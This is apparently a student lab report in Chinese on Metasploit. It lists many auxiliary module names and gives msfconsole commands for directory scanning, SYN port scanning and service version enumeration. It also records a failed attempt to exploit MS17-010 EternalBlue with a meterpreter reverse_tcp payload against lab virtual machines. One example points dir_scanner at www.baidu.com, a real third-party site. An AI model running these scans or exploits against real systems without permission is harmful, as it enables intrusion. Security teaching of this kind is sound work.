scanner/ike/cisco_ike_benigncertain 2016-09-29 normal Cisco IKE Information Disclosure
scanner/imap/imap_version normal IMAP4 Banner Grabber
scanner/ip/ipidseq normal IPID Sequence Scanner
scanner/ipmi/ipmi_cipher_zero 2013-06-20 normal IPMI 2.0 Cipher Zero Authentication Bypass Scanner
scanner/ipmi/ipmi_dumphashes 2013-06-20 normal IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
scanner/ipmi/ipmi_version normal IPMI Information Discovery
scanner/jenkins/jenkins_udp_broadcast_enum normal Jenkins Server Broadcast Enumeration
scanner/kademlia/server_info normal Gather Kademlia Server Information
scanner/llmnr/query normal LLMNR Query
scanner/lotus/lotus_domino_hashes normal Lotus Domino Password Hash Collector
scanner/lotus/lotus_domino_login normal Lotus Domino Brute Force Utility
scanner/lotus/lotus_domino_version normal Lotus Domino Version
scanner/mdns/query normal mDNS Query
scanner/memcached/memcached_amp 2018-02-27 normal Memcached Stats Amplification Scanner
scanner/memcached/memcached_udp_version 2003-07-23 normal Memcached UDP Version Scanner
scanner/misc/cctv_dvr_login normal CCTV DVR Login Scanning Utility
scanner/misc/cisco_smart_install normal Identify Cisco Smart Install endpoints
scanner/misc/clamav_control 2016-06-08 normal ClamAV Remote Command Transmitter
scanner/misc/dahua_dvr_auth_bypass normal Dahua DVR Auth Bypass Scanner
scanner/misc/dvr_config_disclosure normal Multiple DVR Manufacturers Configuration Disclosure
scanner/misc/easycafe_server_fileaccess normal EasyCafe Server Remote File Access
scanner/misc/ib_service_mgr_info normal Borland InterBase Services Manager Information
scanner/misc/java_rmi_server 2011-10-15 normal Java RMI Server Insecure Endpoint Code Execution Scanner
scanner/misc/oki_scanner normal OKI Printer Default Login Credential Scanner
scanner/misc/poisonivy_control_scanner normal Poison Ivy Command and Control Scanner
scanner/misc/raysharp_dvr_passwords normal Ray Sharp DVR Password Retriever
scanner/misc/rosewill_rxs3211_passwords normal Rosewill RXS-3211 IP Camera Password Retriever
scanner/misc/sercomm_backdoor_scanner 2013-12-31 normal SerComm Network Device Backdoor Detection
scanner/misc/sunrpc_portmapper normal SunRPC Portmap Program Enumerator
scanner/misc/zenworks_preboot_fileaccess normal Novell ZENworks Configuration Management Preboot Service Remote File Access
scanner/mongodb/mongodb_login normal MongoDB Login Utility
scanner/motorola/timbuktu_udp 2009-09-25 normal Motorola Timbuktu Service Detection
scanner/mqtt/connect normal MQTT Authentication Scanner
scanner/msf/msf_rpc_login normal Metasploit RPC Interface Login Utility
scanner/msf/msf_web_login normal Metasploit Web Interface Login Utility
scanner/mssql/mssql_hashdump normal MSSQL Password Hashdump
scanner/mssql/mssql_login normal MSSQL Login Utility
scanner/mssql/mssql_ping normal MSSQL Ping Utility
scanner/mssql/mssql_schemadump normal MSSQL Schema Dump
scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal MySQL Authentication Bypass Password Dump
scanner/mysql/mysql_file_enum normal MYSQL File/Directory Enumerator
scanner/mysql/mysql_hashdump normal MYSQL Password Hashdump
scanner/mysql/mysql_login normal MySQL Login Utility
scanner/mysql/mysql_schemadump normal MYSQL Schema Dump
scanner/mysql/mysql_version normal MySQL Server Version Enumeration
scanner/mysql/mysql_writable_dirs normal MYSQL Directory Write Test
scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
scanner/nessus/nessus_ntp_login normal Nessus NTP Login Utility
scanner/nessus/nessus_rest_login normal Nessus RPC Interface Login Utility
scanner/nessus/nessus_xmlrpc_login normal Nessus XMLRPC Interface Login Utility
scanner/nessus/nessus_xmlrpc_ping normal Nessus XMLRPC Interface Ping Utility
scanner/netbios/nbname normal NetBIOS Information Discovery
scanner/nexpose/nexpose_api_login normal NeXpose API Interface Login Utility
scanner/nfs/nfsmount normal NFS Mount Scanner
scanner/nntp/nntp_login normal NNTP Login Utility
scanner/ntp/ntp_monlist normal NTP Monitor List Scanner
scanner/ntp/ntp_nak_to_the_future normal NTP "NAK to the Future"
scanner/ntp/ntp_peer_list_dos 2014-08-25 normal NTP Mode 7 PEER_LIST DoS Scanner
scanner/ntp/ntp_peer_list_sum_dos 2014-08-25 normal NTP Mode 7 PEER_LIST_SUM DoS Scanner
scanner/ntp/ntp_readvar normal NTP Clock Variables Disclosure
scanner/ntp/ntp_req_nonce_dos 2014-08-25 normal NTP Mode 6 REQ_NONCE DRDoS Scanner
scanner/ntp/ntp_reslist_dos 2014-08-25 normal NTP Mode 7 GET_RESTRICT DRDoS Scanner
scanner/ntp/ntp_unsettrap_dos 2014-08-25 normal NTP Mode 6 UNSETTRAP DRDoS Scanner
scanner/openvas/openvas_gsad_login normal OpenVAS gsad Web Interface Login Utility
scanner/openvas/openvas_omp_login normal OpenVAS OMP Login Utility
scanner/openvas/openvas_otp_login normal OpenVAS OTP Login Utility
scanner/oracle/emc_sid normal Oracle Enterprise Manager Control SID Discovery
scanner/oracle/isqlplus_login normal Oracle iSQL*Plus Login Utility
scanner/oracle/isqlplus_sidbrute normal Oracle iSQLPlus SID Check
scanner/oracle/oracle_hashdump normal Oracle Password Hashdump
scanner/oracle/oracle_login normal Oracle RDBMS Login Utility
scanner/oracle/sid_brute normal Oracle TNS Listener SID Bruteforce
scanner/oracle/sid_enum 2009-01-07 normal Oracle TNS Listener SID Enumeration
scanner/oracle/spy_sid normal Oracle Application Server Spy Servlet SID Enumeration
scanner/oracle/tnslsnr_version 2009-01-07 normal Oracle TNS Listener Service Version Query
scanner/oracle/tnspoison_checker 2012-04-18 normal Oracle TNS Listener Checker
scanner/oracle/xdb_sid normal Oracle XML DB SID Discovery
scanner/oracle/xdb_sid_brute normal Oracle XML DB SID Discovery via Brute Force
scanner/pcanywhere/pcanywhere_login normal PcAnywhere Login Scanner
scanner/pcanywhere/pcanywhere_tcp normal PcAnywhere TCP Service Discovery
scanner/pcanywhere/pcanywhere_udp normal PcAnywhere UDP Service Discovery
scanner/pop3/pop3_login normal POP3 Login Utility
scanner/pop3/pop3_version normal POP3 Banner Grabber
scanner/portmap/portmap_amp normal Portmapper Amplification Scanner
scanner/portscan/ack normal TCP ACK Firewall Scanner
scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
scanner/portscan/syn normal TCP SYN Port Scanner
scanner/portscan/tcp normal TCP Port Scanner
scanner/portscan/xmas normal TCP "XMas" Port Scanner
scanner/postgres/postgres_dbname_flag_injection normal PostgreSQL Database Name Command Line Flag Injection
scanner/postgres/postgres_hashdump normal Postgres Password Hashdump
scanner/postgres/postgres_login normal PostgreSQL Login Utility
scanner/postgres/postgres_schemadump normal Postgres Schema Dump
scanner/postgres/postgres_version normal PostgreSQL Version Probe
scanner/printer/canon_iradv_pwd_extract normal Canon IR-Adv Password Extractor
scanner/printer/printer_delete_file normal Printer File Deletion Scanner
scanner/printer/printer_download_file normal Printer File Download Scanner
scanner/printer/printer_env_vars normal Printer Environment Variables Scanner
scanner/printer/printer_list_dir normal Printer Directory Listing Scanner
scanner/printer/printer_list_volumes normal Printer Volume Listing Scanner
scanner/printer/printer_ready_message normal Printer Ready Message Scanner
scanner/printer/printer_upload_file normal Printer File Upload Scanner
scanner/printer/printer_version_info normal Printer Version Information Scanner
scanner/quake/server_info normal Gather Quake Server Information
scanner/rdp/ms12_020_check normal MS12-020 Microsoft Remote Desktop Checker
scanner/rdp/rdp_scanner normal Identify endpoints speaking the Remote Desktop Protocol (RDP)
scanner/redis/file_upload 2015-11-11 normal Redis File Upload
scanner/redis/redis_login normal Redis Login Utility
scanner/redis/redis_server normal Redis Command Execute Scanner
scanner/rogue/rogue_recv normal Rogue Gateway Detection: Receiver
scanner/rogue/rogue_send normal Rogue Gateway Detection: Sender
scanner/rservices/rexec_login normal rexec Authentication Scanner
scanner/rservices/rlogin_login normal rlogin Authentication Scanner
scanner/rservices/rsh_login normal rsh Authentication Scanner
scanner/rsync/modules_list normal List Rsync Modules
scanner/sap/sap_ctc_verb_tampering_user_mgmt normal SAP CTC Service Verb Tampering User Management
scanner/sap/sap_hostctrl_getcomputersystem normal SAP Host Agent Information Disclosure
scanner/sap/sap_icf_public_info normal SAP ICF /sap/public/info Service Sensitive Information Gathering
scanner/sap/sap_icm_urlscan normal SAP URL Scanner
scanner/sap/sap_mgmt_con_abaplog normal SAP Management Console ABAP Syslog Disclosure
scanner/sap/sap_mgmt_con_brute_login normal SAP Management Console Brute Force
scanner/sap/sap_mgmt_con_extractusers normal SAP Management Console Extract Users
scanner/sap/sap_mgmt_con_getaccesspoints normal SAP Management Console Get Access Points
scanner/sap/sap_mgmt_con_getenv normal SAP Management Console getEnvironment
scanner/sap/sap_mgmt_con_getlogfiles normal SAP Management Console Get Logfile
scanner/sap/sap_mgmt_con_getprocesslist normal SAP Management Console GetProcessList
scanner/sap/sap_mgmt_con_getprocessparameter normal SAP Management Console Get Process Parameters
scanner/sap/sap_mgmt_con_instanceproperties normal SAP Management Console Instance Properties
scanner/sap/sap_mgmt_con_listlogfiles normal SAP Management Console List Logfiles
scanner/sap/sap_mgmt_con_startprofile normal SAP Management Console getStartProfile
scanner/sap/sap_mgmt_con_version normal SAP Management Console Version Detection
scanner/sap/sap_router_info_request normal SAPRouter Admin Request
scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
scanner/sap/sap_service_discovery normal SAP Service Discovery
scanner/sap/sap_smb_relay normal SAP SMB Relay Abuse
scanner/sap/sap_soap_bapi_user_create1 normal SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation
scanner/sap/sap_soap_rfc_brute_login normal SAP SOAP Service RFC_PING Login Brute Forcer
scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection
scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection
scanner/sap/sap_soap_rfc_eps_get_directory_listing normal SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure
scanner/sap/sap_soap_rfc_pfl_check_os_file_existence normal SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
scanner/sap/sap_soap_rfc_ping normal SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery
scanner/sap/sap_soap_rfc_read_table normal SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data
scanner/sap/sap_soap_rfc_rzl_read_dir normal SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
scanner/sap/sap_soap_rfc_susr_rfc_user_interface normal SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation
scanner/sap/sap_soap_rfc_sxpg_call_system_exec normal SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution
scanner/sap/sap_soap_rfc_sxpg_command_exec normal SAP SOAP RFC SXPG_COMMAND_EXECUTE
scanner/sap/sap_soap_rfc_system_info normal SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering
scanner/sap/sap_soap_th_saprel_disclosure normal SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure
scanner/sap/sap_web_gui_brute_login normal SAP Web GUI Login Brute Forcer
scanner/scada/digi_addp_reboot normal Digi ADDP Remote Reboot Initiator
scanner/scada/digi_addp_version normal Digi ADDP Information Discovery
scanner/scada/digi_realport_serialport_scan normal Digi RealPort Serial Server Port Scanner
scanner/scada/digi_realport_version normal Digi RealPort Serial Server Version
scanner/scada/indusoft_ntwebserver_fileaccess normal Indusoft WebStudio NTWebServer Remote File Access
scanner/scada/koyo_login 2012-01-19 normal Koyo DirectLogic PLC Password Brute Force Utility
scanner/scada/modbus_findunitid 2012-10-28 normal Modbus Unit ID and Station ID Enumerator
scanner/scada/modbusclient normal Modbus Client Utility
scanner/scada/modbusdetect 2011-11-01 normal Modbus Version Scanner
scanner/scada/moxa_discover normal Moxa UDP Device Discovery
scanner/scada/profinet_siemens normal Siemens Profinet Scanner
scanner/scada/sielco_winlog_fileaccess normal Sielco Sistemi Winlog Remote File Access
scanner/sip/enumerator normal SIP Username Enumerator (UDP)
scanner/sip/enumerator_tcp normal SIP Username Enumerator (TCP)
scanner/sip/options normal SIP Endpoint Scanner (UDP)
scanner/sip/options_tcp normal SIP Endpoint Scanner (TCP)
scanner/sip/sipdroid_ext_enum normal SIPDroid Extension Grabber
scanner/smb/pipe_auditor normal SMB Session Pipe Auditor
scanner/smb/pipe_dcerpc_auditor normal SMB Session Pipe DCERPC Auditor
scanner/smb/psexec_loggedin_users normal Microsoft Windows Authenticated Logged In Users Enumeration
scanner/smb/smb1 normal SMBv1 Protocol Detection
scanner/smb/smb2 normal SMB 2.0 Protocol Detection
scanner/smb/smb_enum_gpp normal SMB Group Policy Preference Saved Passwords Enumeration
scanner/smb/smb_enumshares normal SMB Share Enumeration
scanner/smb/smb_enumusers normal SMB User Enumeration (SAM EnumUsers)
scanner/smb/smb_enumusers_domain normal SMB Domain User Enumeration
scanner/smb/smb_login normal SMB Login Check Scanner
scanner/smb/smb_lookupsid normal SMB SID User Enumeration (LookupSid)
scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
scanner/smb/smb_uninit_cred normal Samba _netr_ServerPasswordSet Uninitialized Credential State
scanner/smb/smb_version normal SMB Version Detection
scanner/smtp/smtp_enum normal SMTP User Enumeration Utility
scanner/smtp/smtp_ntlm_domain normal SMTP NTLM Domain Extraction
scanner/smtp/smtp_relay normal SMTP Open Relay Detection
scanner/smtp/smtp_version normal SMTP Banner Grabber
scanner/snmp/aix_version normal AIX SNMP Scanner Auxiliary Module
scanner/snmp/arris_dg950 normal Arris DG950A Cable Modem Wifi Enumeration
scanner/snmp/brocade_enumhash normal Brocade Password Hash Enumeration
scanner/snmp/cambium_snmp_loot normal Cambium ePMP SNMP Enumeration
scanner/snmp/cisco_config_tftp normal Cisco IOS SNMP Configuration Grabber (TFTP)
scanner/snmp/cisco_upload_file normal Cisco IOS SNMP File Upload (TFTP)
scanner/snmp/cnpilot_r_snmp_loot normal Cambium cnPilot r200/r201 SNMP Enumeration
scanner/snmp/epmp1000_snmp_loot normal Cambium ePMP 1000 SNMP Enumeration
scanner/snmp/netopia_enum normal Netopia 3347 Cable Modem Wifi Enumeration
scanner/snmp/sbg6580_enum normal ARRIS / Motorola SBG6580 Cable Modem SNMP Enumeration Module
scanner/snmp/snmp_enum normal SNMP Enumeration Module
scanner/snmp/snmp_enum_hp_laserjet normal HP LaserJet Printer SNMP Enumeration
scanner/snmp/snmp_enumshares normal SNMP Windows SMB Share Enumeration
scanner/snmp/snmp_enumusers normal SNMP Windows Username Enumeration
scanner/snmp/snmp_login normal SNMP Community Login Scanner
scanner/snmp/snmp_set normal SNMP Set Module
scanner/snmp/ubee_ddw3611 normal Ubee DDW3611b Cable Modem Wifi Enumeration
scanner/snmp/xerox_workcentre_enumusers normal Xerox WorkCentre User Enumeration (SNMP)
scanner/ssh/apache_karaf_command_execution 2016-02-09 normal Apache Karaf Default Credentials Command Execution
scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal Cerberus FTP Server SFTP Username Enumeration
scanner/ssh/detect_kippo normal Kippo SSH Honeypot Detector
scanner/ssh/fortinet_backdoor 2016-01-09 normal Fortinet SSH Backdoor Scanner
scanner/ssh/juniper_backdoor 2015-12-20 normal Juniper SSH Backdoor Scanner
scanner/ssh/karaf_login normal Apache Karaf Login Utility
scanner/ssh/ssh_enumusers normal SSH Username Enumeration
scanner/ssh/ssh_identify_pubkeys normal SSH Public Key Acceptance Scanner
scanner/ssh/ssh_login normal SSH Login Check Scanner
scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner
scanner/ssh/ssh_version normal SSH Version Scanner
scanner/ssl/bleichenbacher_oracle 2009-06-17 normal Scanner for Bleichenbacher Oracle in RSA PKCS #1 v1.5
scanner/ssl/openssl_ccs 2014-06-05 normal OpenSSL Server-Side ChangeCipherSpec Injection Scanner
scanner/ssl/openssl_heartbleed 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Information Leak
scanner/steam/server_info normal Gather Steam Server Information
scanner/telephony/wardial normal Wardialer
scanner/telnet/brocade_enable_login normal Brocade Enable Login Check Scanner
scanner/telnet/lantronix_telnet_password normal Lantronix Telnet Password Recovery
scanner/telnet/lantronix_telnet_version normal Lantronix Telnet Service Banner Detection
scanner/telnet/satel_cmd_exec 2017-04-07 normal Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability
scanner/telnet/telnet_encrypt_overflow normal Telnet Service Encryption Key ID Overflow Detection
scanner/telnet/telnet_login normal Telnet Login Check Scanner
scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator
scanner/telnet/telnet_version normal Telnet Service Banner Detection
scanner/tftp/ipswitch_whatsupgold_tftp 2011-12-12 normal IpSwitch WhatsUp Gold TFTP Directory Traversal
scanner/tftp/netdecision_tftp 2009-05-16 normal NetDecision 4.2 TFTP Directory Traversal
scanner/tftp/tftpbrute normal TFTP Brute Forcer
scanner/udp/udp_amplification normal UDP Amplification Scanner
scanner/upnp/ssdp_amp normal SSDP ssdp:all M-SEARCH Amplification Scanner
scanner/upnp/ssdp_msearch normal UPnP SSDP M-SEARCH Information Discovery
scanner/varnish/varnish_cli_file_read normal Varnish Cache CLI File Read
scanner/varnish/varnish_cli_login normal Varnish Cache CLI Login Utility
scanner/vmware/esx_fingerprint normal VMWare ESX/ESXi Fingerprint Scanner
scanner/vmware/vmauthd_login normal VMWare Authentication Daemon Login Scanner
scanner/vmware/vmauthd_version normal VMWare Authentication Daemon Version Scanner
scanner/vmware/vmware_enum_permissions normal VMWare Enumerate Permissions
scanner/vmware/vmware_enum_sessions normal VMWare Enumerate Active Sessions
scanner/vmware/vmware_enum_users normal VMWare Enumerate User Accounts
scanner/vmware/vmware_enum_vms normal VMWare Enumerate Virtual Machines
scanner/vmware/vmware_host_details normal VMWare Enumerate Host Details
scanner/vmware/vmware_http_login normal VMWare Web Login Scanner
scanner/vmware/vmware_screenshot_stealer normal VMWare Screenshot Stealer
scanner/vmware/vmware_server_dir_trav normal VMware Server Directory Traversal Vulnerability
scanner/vmware/vmware_update_manager_traversal 2011-11-21 normal VMWare Update Manager 4 Directory Traversal
scanner/vnc/ard_root_pw normal Apple Remote Desktop Root Vulnerability
scanner/vnc/vnc_login normal VNC Authentication Scanner
scanner/vnc/vnc_none_auth normal VNC Authentication None Detection
scanner/voice/recorder normal Telephone Line Voice Scanner
scanner/vxworks/wdbrpc_bootline normal VxWorks WDB Agent Boot Parameter Scanner
scanner/vxworks/wdbrpc_version normal VxWorks WDB Agent Version Scanner
scanner/winrm/winrm_auth_methods normal WinRM Authentication Method Detection
scanner/winrm/winrm_cmd normal WinRM Command Runner
scanner/winrm/winrm_login normal WinRM Login Utility
scanner/winrm/winrm_wql normal WinRM WQL Query Runner
scanner/wproxy/att_open_proxy 2017-08-31 normal Open WAN-to-LAN proxy on AT&T routers
scanner/wsdd/wsdd_query normal WS-Discovery Information Discovery
scanner/x11/open_x11 normal X11 No-Auth Scanner
server/android_browsable_msf_launch normal Android Meterpreter Browsable Launcher
server/android_mercury_parseuri normal Android Mercury Browser Intent URI Scheme and Directory Traversal Vulnerability
server/browser_autopwn normal HTTP Client Automatic Exploiter
server/browser_autopwn2 2015-07-05 normal HTTP Client Automatic Exploiter 2 (Browser Autopwn)
server/capture/drda normal Authentication Capture: DRDA (DB2, Informix, Derby)
server/capture/ftp normal Authentication Capture: FTP
server/capture/http normal Authentication Capture: HTTP
server/capture/http_basic normal HTTP Client Basic Authentication Credential Collector
server/capture/http_javascript_keylogger normal Capture: HTTP JavaScript Keylogger
server/capture/http_ntlm normal HTTP Client MS Credential Catcher
server/capture/imap normal Authentication Capture: IMAP
server/capture/mssql normal Authentication Capture: MSSQL
server/capture/mysql normal Authentication Capture: MySQL
server/capture/pop3 normal Authentication Capture: POP3
server/capture/postgresql normal Authentication Capture: PostgreSQL
server/capture/printjob_capture normal Printjob Capture Service
server/capture/sip normal Authentication Capture: SIP
server/capture/smb normal Authentication Capture: SMB
server/capture/smtp normal Authentication Capture: SMTP
server/capture/telnet normal Authentication Capture: Telnet
server/capture/vnc normal Authentication Capture: VNC
server/dhclient_bash_env 2014-09-24 normal DHCP Client Bash Environment Variable Code Injection (Shellshock)
server/dhcp normal DHCP Server
server/dns/native_server normal Native DNS Server (Example)
server/dns/spoofhelper normal DNS Spoofing Helper Service
server/fakedns normal Fake DNS Service
server/ftp normal FTP File Server
server/http_ntlmrelay normal HTTP Client MS Credential Relayer
server/icmp_exfil normal ICMP Exfiltration Service
server/jsse_skiptls_mitm_proxy 2015-01-20 normal Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy
server/local_hwbridge normal Hardware Bridge Server
server/ms15_134_mcl_leak 2015-12-08 normal MS15-134 Microsoft Windows Media Center MCL Information Disclosure
server/netbios_spoof_nat 2016-06-14 normal NetBIOS Response "BadTunnel" Brute Force Spoof (NAT Tunnel)
server/openssl_altchainsforgery_mitm_proxy 2015-07-09 normal OpenSSL Alternative Chains Certificate Forgery MITM Proxy
server/openssl_heartbeat_client_memory 2014-04-07 normal OpenSSL Heartbeat (Heartbleed) Client Memory Exposure
server/pxeexploit normal PXE Boot Exploit Server
server/regsvr32_command_delivery_server normal Regsvr32.exe (.sct) Command Delivery Server
server/socks4a normal Socks4a Proxy Server
server/socks_unc normal SOCKS Proxy UNC Path Redirection
server/tftp normal TFTP File Server
server/webkit_xslt_dropper normal Cross Platform Webkit File Dropper
server/wget_symlink_file_write 2014-10-27 normal GNU Wget FTP Symlink Arbitrary Filesystem Access
server/wpad normal WPAD.dat File Server
sniffer/psnuffle normal pSnuffle Packet Sniffer
spoof/arp/arp_poisoning 1999-12-22 normal ARP Spoof
spoof/cisco/cdp normal Send Cisco Discovery Protocol (CDP) Packets
spoof/cisco/dtp normal Forge Cisco DTP Packets
spoof/dns/bailiwicked_domain 2008-07-21 normal DNS BailiWicked Domain Attack
spoof/dns/bailiwicked_host 2008-07-21 normal DNS BailiWicked Host Attack
spoof/dns/compare_results 2008-07-21 normal DNS Lookup Result Comparison
spoof/dns/native_spoofer normal Native DNS Spoofer (Example)
spoof/llmnr/llmnr_response normal LLMNR Spoofer
spoof/mdns/mdns_response normal mDNS Spoofer
spoof/nbns/nbns_response normal NetBIOS Name Service Spoofer
spoof/replay/pcap_replay normal Pcap Replay Utility
sqli/oracle/dbms_cdc_ipublish 2008-10-22 normal Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
sqli/oracle/dbms_cdc_publish 2008-10-22 normal Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE
sqli/oracle/dbms_cdc_publish2 2010-04-26 normal Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE
sqli/oracle/dbms_cdc_publish3 2010-10-13 normal Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET
sqli/oracle/dbms_cdc_subscribe_activate_subscription 2005-04-18 normal Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION
sqli/oracle/dbms_export_extension 2006-04-26 normal Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION
sqli/oracle/dbms_metadata_get_granted_xml 2008-01-05 normal Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML
sqli/oracle/dbms_metadata_get_xml 2008-01-05 normal Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML
sqli/oracle/dbms_metadata_open 2008-01-05 normal Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN
sqli/oracle/droptable_trigger 2009-01-13 normal Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger
sqli/oracle/jvm_os_code_10g 2010-02-01 normal Oracle DB 10gR2, 11gR1/R2 DBMS_JVM_EXP_PERMS OS Command Execution
sqli/oracle/jvm_os_code_11g 2010-02-01 normal Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution
sqli/oracle/lt_compressworkspace 2008-10-13 normal Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE
sqli/oracle/lt_findricset_cursor 2007-10-17 normal Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
sqli/oracle/lt_mergeworkspace 2008-10-22 normal Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE
sqli/oracle/lt_removeworkspace 2008-10-13 normal Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE
sqli/oracle/lt_rollbackworkspace 2009-05-04 normal Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE
voip/asterisk_login normal Asterisk Manager Login Utility
voip/cisco_cucdm_call_forward normal Viproy CUCDM IP Phone XML Services - Call Forwarding Tool
voip/cisco_cucdm_speed_dials normal Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool
voip/sip_deregister normal SIP Deregister Extension
voip/sip_invite_spoof normal SIP Invite Spoof
voip/telisca_ips_lock_control 2015-12-17 normal Telisca IPS Lock Cisco IP Phone Control
vsploit/malware/dns/dns_mariposa normal VSploit Mariposa DNS Query Module
vsploit/malware/dns/dns_query normal VSploit DNS Beaconing Emulation
vsploit/malware/dns/dns_zeus normal VSploit Zeus DNS Query Module
vsploit/pii/email_pii normal VSploit Email PII
vsploit/pii/web_pii normal VSploit Web PII
以下是参考msf手册学习的几个辅助模块用法:
- 使用dir_scanner搜索网站目录
- msf > use auxiliary/scanner/http/dir_scanner
- msf auxiliary(scanner/http/dir_scanner) > set THREADS 50//设置进程号50
- msf auxiliary(scanner/http/dir_scanner) > set RHOSTS www.baidu.com//搜索百度的网站目录
- msf auxiliary(scanner/http/dir_scanner) > exploit
dir_scanner模块发现了百度网站中的目录cache,http状态码200表示请求已成功,结果如下:
-
使用namp进行活跃主机探测,-sh参数类似ping。
-
端口扫描模块,使用
search portscan查看有以下几种:- auxiliary/scanner/portscan/ack :通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测
- auxiliary/scanner/portscan/ftpbounce :通过FTP bounce攻击的原理对TCP服务进行枚举,在一些旧的Solaris及FreeBSD系统的FTP服务中此类攻击方式仍能被利用。
- auxiliary/scanner/portscan/syn:使用发送TCP SYN标志的方式探测开放的端口(推荐)
- auxiliary/scanner/portscan/tcp:通过一次完整的TCP连接来判断端口是否开放
- auxiliary/scanner/portscan/xmas :通过发送FIN、PSH、URG标志,相对而言较为隐蔽。
-
使用syn扫描过程如下:
- msf > use auxiliary/scanner/portscan/syn
- msf auxiliary(scanner/portscan/syn) > set RHOSTS 172.20.10.2//设置被扫描主机IP
- msf auxiliary(scanner/portscan/syn) > set THREADS 20
- msf auxiliary(scanner/portscan/syn) > run
-
服务查点辅助模块,使用
msf > search name:_version查看可用的服务查点模块- auxiliary/scanner/telnet/telnet_version
- auxiliary/scanner/ssh/ssh_version
- auxiliary/scanner/oracle/tnslsnr_version
-
其中telnet服务查点指令如下:
- msf > use auxiliary/scanner/telnet/telnet_version
- msf auxiliary(scanner/telnet/telnet_version) > set RHOSTS 10.10.10.0/24//扫描该网段所有主机
- msf auxiliary(scanner/telnet/telnet_version) > set THREADS 100
- msf auxiliary(scanner/telnet/telnet_version) > run
五、尝试利用ms17_010_eternalblue漏洞进行攻击
①攻击机:kali linux ip:192.168.217.132 ②目标机1:windowsXP Professional sp2(与漏洞不匹配,失败) ip:192.168.217.135 ③目标机2:Windows Server 2008 R2
首先确定自己想要攻击的漏洞:
- 进入到/usr/share/metasploit-framework/modules/exploits/windows路径下
- 查看都有哪些方面的漏洞,选择一个自己感兴趣的,我选择的是“smb”
- 进入到smb文件夹,选择一个漏洞,我选择了永恒之蓝漏洞“ms17_010_eternalblue.rb”
- 事实上确定攻击什么漏洞之前,我们可以在msf中扫描一下靶机,看看有啥漏洞:
nmap --script=vuln 192.168.217.135这里的IP要用靶机IP。
扫描结果如下,这里显示有ms17_010漏洞:
- 然后打开一个终端输入msfconsole进入控制台,输入以下指令:
- msf > use exploits/windows/smb/ms17_010_eternalblue//使用ms17_010_eternablue漏洞
- msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.217.135//设置靶机IP
- show options//查看选项
- msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp//配置payload
- msf exploit(ms17_010_eternalblue) > set lhost 192.168.217.132//设置kaliIP
- msf exploit(ms17_010_eternalblue) > exploit//开始攻击
最终结果失败,不出意料,因为在showoptions时,显示的攻击目标为Windows 7 and Server 2008 R2 (x64) All Service Packs,没有包含自己使用的XP操作系统(但是扫描时为什么会出现这个漏洞我也不太清楚)。
解决:尝试用提示的“Server 2008 R2(x64)”作为靶机,进行攻击,流程相同,只需要把靶机IP改成对应的新虚拟机IP(192.168.217.136)这里不再赘述。
结果还是失败了……不知道是不是因为环境的原因,用Win 7再试一次(靶机IP变为192.168.217.137)
结果失败,感觉的过程有问题,再从网上搜几个方法试试:
因为EternalBlue需要python2.6.6,32位,以及pywin32-221,32位版本,所以攻击的计算机除了kali还需要一个安装Python 2.6程序和PyWin32 v2.12的XP。
网上有个教程,利用永恒之蓝漏洞攻击,用了三个计算机。
① 靶机:windows7 sp1 IP:192.168.217.137;②控制端:kali IP:192.168.217.132;③运行攻击程序、注入dll的32位计算机:Windows XP;
具体操作详见利用NSA的MS17-010漏洞利用工具实现Win 7和Win Server 2008系统入侵或关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
实验总结与体会
